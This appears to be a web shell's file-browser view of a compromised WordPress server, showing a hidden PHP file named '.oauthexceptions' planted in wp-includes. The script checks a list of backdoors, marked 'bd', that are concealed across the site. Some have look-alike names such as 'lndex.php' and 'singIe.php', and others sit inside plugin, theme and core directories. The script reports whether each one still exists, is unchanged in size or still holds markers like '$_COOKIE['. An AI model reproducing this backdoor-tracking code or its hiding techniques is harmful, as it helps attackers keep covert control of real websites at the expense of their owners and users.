HEX
Server: Apache
System: Linux WWW 6.1.0-40-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.153-1 (2025-09-20) x86_64
User: web11 (1011)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: /var/www/media.kauko.lt/wp-includes/.oauthexceptions
<?php   $r = '/var/www/media.kauko.lt'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@4196@@Content-Security-Policy",
"/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@85607@@Large-Allocation",
"//wp-includes/html-api/class-wp-html-tag-processor.php"=>"bd@@4613@@$_COOKIE[4",
"//wp-content/themes/config-1747133577/lndex.php"=>"bd@@24335@@277",
"/wp-content/plugins/elementor/modules/history/views/history-panel-template.php"=>"bd@@4632@@36",
"/wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-file-webconfig.php"=>"bd@@4671@@$_COOKIE[8",
"//.tmb/quiz.php"=>"bd@@3906@@696",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/blogs.moderation.php"=>"bd@@4694@@2276",
"//wp-content/themes/archives_1747133396/singIe.php"=>"bd@@23904@@763",
"/wp-includes/post-formats.php"=>"bd@@85608@@36",
"/wp-admin/includes/class-wp-debug-data.php"=>"bd@@85611@@59",
"/wp-content/plugins/elementor/core/common/modules/connect/apps/connect.app.php"=>"bd@@4716@@1732",
"/wp-includes/rest-api/endpoints/class-wp-rest-block-patterns-controller.php"=>"bd@@85613@@48",
"/wp-includes/taxonomy.php"=>"bd@@85615@@8",
"/wp-content/plugins/elementor/core/editor/loader/v1/templates/editor.body.v1.view.php"=>"bd@@4722@@613",
"/wp-content/themes/archives_1747133396/inc/header-layouts.php"=>"bd@@85618@@_COOKIE[3]",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/invoker/src/ParameterResolver/Container/arabic_mimes.php"=>"bd@@85619@@573",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/customer_rec.php"=>"bd@@85620@@1011",
"/wp-content/plugins/elementor/app/modules/kit-library/data/kits/endpoints/download.link.php"=>"bd@@85621@@1051",
"/wp-content/plugins/elementor/app/modules/import-export/runners/revert/plugins.content.php"=>"bd@@85622@@1047",
"/wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/archiver/class.ai1wm.compressor.php"=>"bd@@85623@@1535",
"/wp-content/plugins/wordfence/mewgpkdq.php"=>"bd@@4484@@$_COOKIE[-",
"/wp-content/plugins/elementor/assets/js/packages/editor-responsive/editor.responsive.asset.php"=>"bd@@4740@@673",
"/wp-includes/class-wp-recovery-mode-email-service.php"=>"bd@@4554@@event_handler",
"/wp-content/plugins/elementor/app/modules/import-export/runners/export/site.settings.php"=>"bd@@4712@@384"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');